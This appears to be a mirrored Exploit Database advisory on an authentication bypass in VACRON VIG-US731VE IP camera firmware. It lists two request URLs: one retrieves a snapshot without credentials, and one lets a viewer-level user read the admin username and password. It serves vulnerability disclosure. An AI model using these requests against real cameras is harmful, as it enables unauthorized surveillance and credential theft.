VACRON VIG-US731VE 1.0.18-09-B727 IP Camera – Authentication Bypass

• Exploit Database
• 43 阅读

• 作者： Viktoras
  日期： 2017-07-20
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42352/

• # Exploit Title: IP Camera VACRON VIG-US731VE
  # Date: 2017-07-18
  # Exploit Author: anonymous
  # Vendor Homepage: www.vacron.com
  # Version: V1.0.18-09-B727
  
  1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
  2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd
  
  
  there is newer firmware available from the vendor, but I haven't tested on that one.